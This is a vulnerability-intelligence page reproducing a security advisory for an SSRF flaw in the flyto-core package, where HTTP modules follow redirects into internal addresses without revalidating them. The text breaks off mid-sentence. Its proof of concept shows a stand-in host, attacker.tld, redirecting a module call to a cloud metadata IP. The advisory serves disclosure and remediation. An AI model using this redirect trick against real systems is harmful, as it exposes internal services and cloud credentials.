highCVSS 8.5Vulnerability

CVE-2026-67424

## Summary The HTTP modules that DO call the SSRF guard (`http.get`, `http.request`, `http.batch`) validate only the initial URL, then issue the request with aiohttp's default `allow_redirects=True` and perform no per-hop revalidation. An attacker hosts a public URL that 302-redirects to an internal address; the guard passes on the public host and aiohttp transparently follows the redirect into internal space, returning the internal body. ## Root Cause `src/core/modules/atomic/http/get.py:116` calls `session.get(url, ...)` with no `allow_redirects` argument → aiohttp default `True`. `request.py:60` sets `allow_redirects=follow_redirects` (default True at :327); `batch.py:57` likewise. A repo grep of `http/` for `on_request_redirect` / `response.history` returns NONE — there is no redirect interception or Location revalidation. ## Impact Full readable SSRF that defeats the primary SSRF control on the very modules that correctly validate. Confidentiality of internal/metadata responses (C:H), S:C. ## Proof of Concept Verified live: `http.get` with allowlisted base `127.0.0.1` followed a `302 Location: http://127.0.0.2/...` (non-allowlisted) and returned `INTERNAL-VIA-REDIRECT`. ``` attacker hosts http://attacker.tld/r -> 302 Location: http://<cloud-metadata-ip>/latest/meta-data/... execute_module http.get {"url":"http://attacker.tld/r"} ``` ## Attack Chain 1. Entry: `execute_module http.get {url:"http://attacker.tld/r"}` (attacker 302->internal). Guard: `validate_url_with_env_config(url)` (get.py:104). Bypass proof: validation runs on `attacker.tld` (public) → passes; never re-run on the redirect target. 2. Sink: `session.get(url)` (get.py:116) — no `allow_redirects` arg → aiohttp default True. Bypass proof: grep of `http/` for `on_request_redirect`/`response.history` → NONE. 3. Impact: aiohttp follows 302 to the internal host; internal body returned (get.py:118). ## Bypass Evidence Live PoC followed a 302 into non-allowlisted loopback and returned the internal

Properties

severity
high
summary
Flyto2 Core: Guarded HTTP modules follow redirects into internal space without per-hop SSRF revalidation
epss_score
0.00237
cvss_score
8.5
ghsa_published
2026-07-30T14:48:16Z
source_url
https://github.com/advisories/GHSA-c9hr-64h3-gxpc
ghsa_updated
2026-07-30T14:48:19Z
ghsa_id
GHSA-c9hr-64h3-gxpc
cve_id
CVE-2026-67424
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
signal_observed_at
2026-09-11T17:55:57+00:00
is_ghsa_only
false
epss_percentile
0.14723

Related Entities (5)

ENRICHED_BY (1)

[Source]FIRST EPSS

VULNERABLE_TO (1)

[Software]pip/flyto-core

AFFECTS (1)

[Software]pip/flyto-core

HAS_WEAKNESS (1)

[Weakness]Server-Side Request Forgery (SSRF)

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-67424 (CVSS 8.5) — Ninja Signal Threat Intelligence | Ninja Signal